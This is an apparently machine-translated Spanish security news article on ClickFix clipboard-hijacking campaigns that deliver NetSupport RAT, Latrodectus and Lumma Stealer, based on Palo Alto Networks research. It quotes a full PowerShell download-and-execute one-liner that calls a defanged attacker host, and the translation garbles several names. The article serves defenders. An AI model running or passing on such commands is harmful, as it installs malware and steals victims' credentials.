Al emerger a fines de 2024 y surgiendo durante la primera mitad de 2025, ClickFix se ha convertido en un vector generalizado de ingeniería social en el que los actores de amenaza engañan a los usuarios para ejecutar comandos maliciosos bajo la apariencia de “soluciones rápidas” para problemas de computadora comunes.
En lugar de confiar en kits de exploits o accesorios maliciosos, los atacantes emplean secuestro de portapapeles, inyectando comandos ofuscados en el portapapeles de la víctima, e instruirles que peguen y ejecuten estos comandos a través de atajos de Shell de Windows como Win+R o Win+X.
La simplicidad de esta táctica permite a los adversarios evitar muchos controles de prevención estándar y desplegar silenciosamente una gama de familias de malware en puntos finales comprometidos.
Los analistas de Palo Alto Networks tienen identificado Tres campañas prominentes aprovechando ClickFix en los últimos meses.
En una campaña, NetSupport Rat se distribuye a través de dominios de cargadores disfrazados de servicios legítimos como Docusign y Okta.
Una página de destino cuidadosamente elaborada instruye a las víctimas que abran el diálogo Ejecutar (WIN+R) y peguen un comando PowerShell inyectado, que posteriormente descarga un archivo zip que contiene un cargador DLL malicioso.
Esta DLL se resuelve a través de un ejecutable legítimo de Java (JP2Launcher.exe), recupera las cargas útiles cifradas (data_3.bin y data_4.bin) utilizando curl.exe y, en última instancia, lanza NetSupport Rat 32.exe en la memoria.
Instancias de infección semanales desde el comienzo de 2025 (fuente – Palo Alto Netorks)
En otra serie de ataques, los actores de amenaza que despliegan Latrodectus combinan señuelos de ClickFix con infraestructura ClearFake. Las víctimas que visitan sitios web comprometidos se redirigen a páginas de verificación falsas que inyectan un comando codificado PowerShell en el portapapeles.
Cuando se ejecuta, el comando usa curl.exe para obtener un descargador de JavaScript que recupera un instalador MSI, que SideLoads Latrodectus como un DLL malicioso (libcef.dll) dentro de un proceso legítimo.
Distribución de las industrias afectadas por los señuelos de ClickFix (Fuente – Palo Alto Netorks)
La DLL final inyecta shellcode para cosechar credenciales del navegador y exfiltrate los datos a un servidor remoto.
Una tercera ola de intrusiones enruta a las víctimas a través de dominios de registro IP tipográfico para entregar el robador de lumma.
Como señalaron los investigadores de Palo Alto Networks, cada víctima recibe un comando MSHTA único que descarga un guión PowerShell codificado por Base64.
Este script cae y ejecuta un cargador basado en Autoit (PartyContinued.exe), que desempaqueta un archivo de cabina (boat.pst) y construye un binario de motor Autoit3 (slovenia.com) para lanzar la carga útil de Lumma.
Página de destino falsa para Docmusmuns en Docusmusdun.sa (.) Com (Surce – Palo Alto Netorks)
Luego, el cargador ejecuta una serie de operaciones de línea de comandos (CMD /C MD, Copy /B, Choice) para extraer, ensamblar y ejecutar el robador sin más interacción del usuario.
Mecanismo de infección mediante secuestro de portapapeles
En el corazón del Vector ClickFix está Pastejacking: JavaScript en una página web maliciosa sobrescribe el portapapeles del usuario con una cadena de comando ofuscada y muestra instrucciones inocuas para “verificar” o “solucionar” un problema.
La cadena de infección de rata NetSupport (Fuente – Netorks de Palo Alto)
Al pegar el diálogo o terminal Ejecutar, la víctima ejecuta involuntariamente un script que descarga y organiza componentes adicionales.
Por ejemplo, la cadena PowerShell inyectada utilizada en la campaña de rata de soporte de Nets aparece como:-
Powershell.exe -noprofile -ExecutionPolicy bypass -command “IEX (new -object net.webclient) .downloadString (‘hxxps: //diab.live/up/loader.ps1’)”
La cadena está completamente oculta a la vista del usuario al agregar comentarios de aspecto benigno, como “Identificador en la nube: 2031”, al final del script.
Página de destino falsa para Okta en Oktacheck.it (.) Com (Fuente – Palo Alto Netorks)
Una vez ejecutado, el script llega al C2 del atacante, recupera el cargador de la siguiente etapa e inicia la cadena de infección de varias etapas.
Este mecanismo de entrega basado en el portapapeles evita efectivamente la mayoría de las defensas centradas en el correo electrónico y la red, lo que pone mayor énfasis en el monitoreo de comportamiento de punto final y el análisis de artefactos de registro.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
